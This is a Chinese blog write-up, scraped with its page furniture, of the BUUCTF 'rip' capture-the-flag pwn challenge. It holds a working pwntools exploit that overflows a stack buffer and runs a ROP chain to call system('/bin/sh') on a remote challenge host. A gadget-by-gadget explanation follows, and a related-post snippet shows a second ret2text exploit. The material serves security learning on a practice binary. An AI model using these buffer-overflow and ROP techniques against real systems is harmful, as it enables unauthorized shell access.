buuctf pwn rip 1,rop解法

最新推荐文章于 2024-04-26 17:43:46 发布
最新推荐文章于 2024-04-26 17:43:46 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 技巧 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/amber_o0k/article/details/121198988
版权 
from pwn import *

io = remote('node4.buuoj.cn', 27175)
pop_rdi_ret=0x4011fb
bin_sh=0x40201b
syscall=0x401040
ret=0x401016
payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall)
io.sendline(payload)
io.interactive()

这个解法有点复杂了,强行构造了一波rop。

以下讨论均基于64位程序,32位程序略有不同。

通过ida的栈结构视图可见主函数的栈帧(这个不一定准确) ,注意到第一个s长度为0xF,然后是长度为8的ebp,然后是返回地址r。

所以padding长度为0xF+8

p64(ret)是为了栈对齐,具体原理我也不懂,但是缺少这句是无法getshell 的。

p64(pop_rdi_ret)+,这句完成2个功能,一为rdi寄存器赋值,为调用system函数做参数准备,赋值内容为p64(bin_sh),二为ret到下一个要执行的函数(即劫持rip到下一个要执行的命令地址,这里是system),也就是p64(syscall)==system。通过ROPgadget可以找到pop_rdi_ret的地址。ROPgadget  --binary rip --only 'pop|ret'

**pop rdi后程序会紧接着执行ret,ret的就相当于pop rip,从栈的栈顶取出数据并给rip赋值,而rip决定程序下一步执行哪条命令

p64(bin_sh)+,字符串地址,通过ida的shift+f12可以找到

p64(syscall),system函数地址,通过ida的函数列表可以找到。成功执行system获取shell的前提操作是\bin\sh已作为参数赋值给RDI。

stack
高地址system_addresssystem函数地址
BIN_SH_address\bin\sh字符串地址
POP_RDI_RETRIP
padding,长度8(64位程序)RBP
低地址padding,长度0xF变量s

RAVEN_1452
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2475
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
buu rip1
热门推荐
weixin_42238862的博客
10-02 1万+
文章目录前言一、看看程序有没有保护二、对程序源码进行分析1.判断溢出点2.手动测试溢出字符长度3.EXP总结 前言 本人刚刚入坑二进制不久,因为以前主玩渗透测试,所以喜欢学习理论的同时,做一些实战的题目,这不就在BUU上看到了一道pwn的入门题RIP1,但是这个题也让我知道二进制的门槛不是一般的高,第一次写文章,大佬勿喷! 一、看看程序有没有保护 常规操作,查看程序的位数以及各种保护机制!可以看到程序是linux下的程序为64位,并且没有开启任何保护 二、对程序源码进行分析 1.判断溢出点 把程序拖进
BUUCTF-rip
m0_64180167的博客
04-11 662
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1270
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
pwn | BUUCTF rip 1&& pwn基本思路
最新发布
Mintind的博客
04-26 1136
(写得好详细我好爱(为什么payload有两种写法于。
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5666
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 721
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
Pwn | CTF】BUUCTF rip1
weixin_46301214的博客
02-02 601
可能是因为fun函数里有system这种终端控制函数,所以能getshell吧。那么来看一下main,发现很简单,只有一个gets获取输入,存到s数组变量里。打开IDA,发现函数里有一个fun函数,能直接调用系统函数。然后又可以建立连接,很屌,解释不清楚,以后做多两题才懂。知道了缓冲区大小,下一步就要知道fun函数的入口地址。这文件是在靶机,就是靶机存在这个漏洞,我们要攻击他。从汇编上看,是能够发现有注释告诉我们的入口地址。我们要做的就是利用这个函数进行调用系统函数。看一下双击s变量,缓冲区大小。
BUUCTF -rip
weixin_56301399的博客
07-20 386
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
pwn的初学记录
limenzzz的博客
10-19 495
pwn的基础题目学习
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4928
BUU CTF PWN 入门知识详解
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 582
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1284
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 3201
pwn笔记 - ret2text - 函数传参
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值